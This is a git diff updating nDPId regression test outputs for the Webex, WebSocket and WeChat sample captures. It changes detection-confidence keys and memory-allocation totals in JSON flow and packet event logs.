+00814{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1444570628113,"flow_last_seen":1444570628619,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":399,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41350,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00813{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1444570628117,"flow_last_seen":1444570628568,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":399,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41351,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} 
+00915{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1444570631722,"flow_last_seen":1444570633204,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":8394,"flow_tot_l4_payload_len":24960,"flow_avg_l4_payload_len":960,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41354,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00916{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1444570633357,"flow_last_seen":1444570635974,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":8847,"flow_tot_l4_payload_len":40410,"flow_avg_l4_payload_len":1063,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41358,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} 
+00915{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1444570636387,"flow_last_seen":1444570640346,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":7463,"flow_avg_l4_payload_len":439,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41386,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} 00576{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1444570640319,"flow_last_seen":1444570652361,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41394,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00915{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1444570672215,"flow_last_seen":1444570673280,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":7463,"flow_avg_l4_payload_len":533,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41419,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00915{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1444570672215,"flow_last_seen":1444570673280,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":7463,"flow_avg_l4_payload_len":533,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41419,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} 
00567{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","packets-captured":1580,"packets-processed":1580,"total-skipped-flows":0,"total-l4-payload-len":778771,"total-not-detected-flows":0,"total-guessed-flows":4,"total-detected-flows":53,"total-detection-updates":38,"total-updates":0,"current-active-flows":0,"total-active-flows":57,"total-idle-flows":57,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":383,"global_ts_msec":1444570742172} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 1580/1580 @@ -389,9 +389,9 @@ ~~ total active/idle flows...: 57/57 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 6218878 bytes -~~ total memory freed........: 6218878 bytes -~~ total allocations/frees...: 120215/120215 +~~ total memory allocated....: 6352512 bytes +~~ total memory freed........: 6352512 bytes +~~ total allocations/frees...: 122977/122977 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 450 chars ~~ json string max len.......: 1859 chars diff --git a/test/results/websocket.pcap.out b/test/results/websocket.pcap.out index 3ed507370..4b4243aeb 100644 --- a/test/results/websocket.pcap.out +++ b/test/results/websocket.pcap.out 
@@ -2,10 +2,10 @@ 00549{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"websocket.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1475155931028} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"websocket.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1475155931028,"flow_last_seen":1475155931028,"flow_idle_time":7580000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":1,"thread_ts_msec":1475155931028,"l3_proto":"ip4","src_ip":"192.168.43.135","dst_ip":"192.168.43.1","src_port":12345,"dst_port":50999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"websocket.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1475155931028,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1475155931028,"pkt":"AFBWwAAIAAwpij2nCABFAABB27JAAEAGhyvAqCuHwKgrATA5xzc8ilRnydSxV1AYAO1IlQAAgRdXZWxjb21lLCAxOTIuMTY4LjQzLjEgIQ=="} 
-00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"websocket.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1475155931028,"flow_last_seen":1475155931028,"flow_idle_time":7580000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":1,"thread_ts_msec":1475155931028,"l3_proto":"ip4","src_ip":"192.168.43.135","dst_ip":"192.168.43.1","src_port":12345,"dst_port":50999,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WebSocket","breed":"Acceptable","category":"Web"}} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"websocket.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1475155931028,"flow_last_seen":1475155931028,"flow_idle_time":7580000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":1,"thread_ts_msec":1475155931028,"l3_proto":"ip4","src_ip":"192.168.43.135","dst_ip":"192.168.43.1","src_port":12345,"dst_port":50999,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WebSocket","breed":"Acceptable","category":"Web"}} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"websocket.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1475155946892,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1475155946892,"pkt":"AAwpij2nAFBWwAAICABFAAA6BcdAAEAGXR7AqCsBwKgrh8c3MDnJ1LFXPIpUgFAYP+\/mwAAAgYzhfo65lRv9zcET68qSH+nc"} 
00525{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"websocket.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1475155946903,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"thread_ts_msec":1475155946903,"pkt":"AFBWwAAIAAwpij2nCABFAABc27NAAEAGhw\/AqCuHwKgrATA5xzc8ilSAydSxaVAYAO0tVgAAgTIyMTozMzo1MiAoJzE5Mi4xNjguNDMuMScsIDUwOTk5KSBzYXk6IHRlc3QgbWVzc2FnZQ=="} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5,"source":"websocket.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1475155931028,"flow_last_seen":1475156008657,"flow_idle_time":7580000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":34,"midstream":1,"thread_ts_msec":1475156008657,"l3_proto":"ip4","src_ip":"192.168.43.135","dst_ip":"192.168.43.1","src_port":12345,"dst_port":50999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WebSocket","breed":"Acceptable","category":"Web"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5,"source":"websocket.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1475155931028,"flow_last_seen":1475156008657,"flow_idle_time":7580000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":34,"midstream":1,"thread_ts_msec":1475156008657,"l3_proto":"ip4","src_ip":"192.168.43.135","dst_ip":"192.168.43.1","src_port":12345,"dst_port":50999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WebSocket","breed":"Acceptable","category":"Web"}} 
00553{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":5,"source":"websocket.pcap","alias":"nDPId-test","packets-captured":5,"packets-processed":5,"total-skipped-flows":0,"total-l4-payload-len":171,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1475156008657} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 5/5 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5871636 bytes -~~ total memory freed........: 5871636 bytes -~~ total allocations/frees...: 118120/118120 +~~ total memory allocated....: 6005270 bytes +~~ total memory freed........: 6005270 bytes +~~ total allocations/frees...: 120882/120882 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 465 chars ~~ json string max len.......: 689 chars diff --git a/test/results/wechat.pcap.out b/test/results/wechat.pcap.out index b0a915a36..f3915ada3 100644 --- a/test/results/wechat.pcap.out +++ b/test/results/wechat.pcap.out 
@@ -5,26 +5,26 @@ 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"wechat.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1492167337792,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167337792,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0B7NAAEAGDZLAqAFny82XotNEAbsWJbkHbCUOQoAQAk6qQAAAAQEICgAwqxZF0ZUD"} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"wechat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167338426,"flow_last_seen":1492167338426,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492167338426,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"wechat.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1492167338426,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1492167338426,"pkt":"AQBeAAD7eJKcD6iOCABFAABEuMlAAAERHdXAqAFn4AAA+xTpFOkAMOiYAAAAAAABAAAAAAAAC19nb29nbGVjYXN0BF90Y3AFbG9jYWwAAAwAAQ=="} 
-00679{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"wechat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167338426,"flow_last_seen":1492167338426,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492167338426,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_googlecast._tcp.local"}} +00679{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"wechat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167338426,"flow_last_seen":1492167338426,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492167338426,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_googlecast._tcp.local"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"wechat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167338426,"flow_last_seen":1492167338426,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492167338426,"l3_proto":"ip6","src_ip":"fe80::7a92:9cff:fe0f:a88e","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00516{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"wechat.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1492167338426,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":102,"pkt_l4_len":48,"thread_ts_msec":1492167338426,"pkt":"MzMAAAD7eJKcD6iOht1gAAAAADARAf6AAAAAAAAAepKc\/\/4PqI7\/AgAAAAAAAAAAAAAAAAD7FOkU6QAwzvQAAAAAAAEAAAAAAAALX2dvb2dsZWNhc3QEX3RjcAVsb2NhbAAADAAB"} -00688{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"wechat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167338426,"flow_last_seen":1492167338426,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492167338426,"l3_proto":"ip6","src_ip":"fe80::7a92:9cff:fe0f:a88e","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_googlecast._tcp.local"}} +00688{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"wechat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167338426,"flow_last_seen":1492167338426,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492167338426,"l3_proto":"ip6","src_ip":"fe80::7a92:9cff:fe0f:a88e","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_googlecast._tcp.local"}} 
00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"wechat.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1492167338426,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1492167338426,"pkt":"AQBeAAD7eJKcD6iOCABFAABEuMpAAAERHdTAqAFn4AAA+xTpFOkAMOiYAAAAAAABAAAAAAAAC19nb29nbGVjYXN0BF90Y3AFbG9jYWwAAAwAAQ=="} 00516{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"wechat.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1492167338426,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":102,"pkt_l4_len":48,"thread_ts_msec":1492167338426,"pkt":"MzMAAAD7eJKcD6iOht1gAAAAADARAf6AAAAAAAAAepKc\/\/4PqI7\/AgAAAAAAAAAAAAAAAAD7FOkU6QAwzvQAAAAAAAEAAAAAAAALX2dvb2dsZWNhc3QEX3RjcAVsb2NhbAAADAAB"} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"wechat.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1492167339426,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1492167339426,"pkt":"AQBeAAD7eJKcD6iOCABFAABEuN1AAAERHcHAqAFn4AAA+xTpFOkAMOiYAAAAAAABAAAAAAAAC19nb29nbGVjYXN0BF90Y3AFbG9jYWwAAAwAAQ=="} 
00516{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"wechat.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1492167339427,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":102,"pkt_l4_len":48,"thread_ts_msec":1492167339427,"pkt":"MzMAAAD7eJKcD6iOht1gAAAAADARAf6AAAAAAAAAepKc\/\/4PqI7\/AgAAAAAAAAAAAAAAAAD7FOkU6QAwzvQAAAAAAAEAAAAAAAALX2dvb2dsZWNhc3QEX3RjcAVsb2NhbAAADAAB"} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"wechat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167342857,"flow_last_seen":1492167342857,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1492167342857,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":53734,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"wechat.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1492167342857,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"thread_ts_msec":1492167342857,"pkt":"8IQvSpdgeJKcD6iOCABFAABQ0QRAAEAR5OLAqAFnwKgB\/tHmADUAPEQCPBkBAAABAAAAAAAADHNhZmVicm93c2luZxFnb29nbGV1c2VyY29udGVudANjb20AAAEAAQ=="} 
-00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"wechat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167342857,"flow_last_seen":1492167342857,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1492167342857,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":53734,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"safebrowsing.googleusercontent.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"wechat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167342857,"flow_last_seen":1492167342857,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1492167342857,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":53734,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"safebrowsing.googleusercontent.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00742{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"wechat.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1492167342893,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":272,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":272,"pkt_l4_len":238,"thread_ts_msec":1492167342893,"pkt":"eJKcD6iO8IQvSpdgCABFoAECAABAAEARtJXAqAH+wKgBZwA10eYA7qtlPBmBgAABAAIABAAEDHNhZmVicm93c2luZxFnb29nbGV1c2VyY29udGVudANjb20AAAEAAcAMAAUAAQAANssADgJzYgFsBmdvb2dsZcArwEAAAQABAAAAxwAErNkWDsBDAAIAAQAACYwABgNuczHARcBDAAIAAQAACYwABgNuczTARcBDAAIAAQAACYwABgNuczLARcBDAAIAAQAACYwABgNuczPARcBqAAEAAQABNLQABNjvIArAjgABAAEAATS0AATY7yIKwKAAAQABAAE0tAAE2O8kCsB8AAEAAQABNLQABNjvJgo="} -00807{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":12,"source":"wechat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492167342857,"flow_last_seen":1492167342893,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":230,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1492167342893,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":53734,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"safebrowsing.googleusercontent.com","num_queries":1,"num_answers":10,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.22.14"}} 
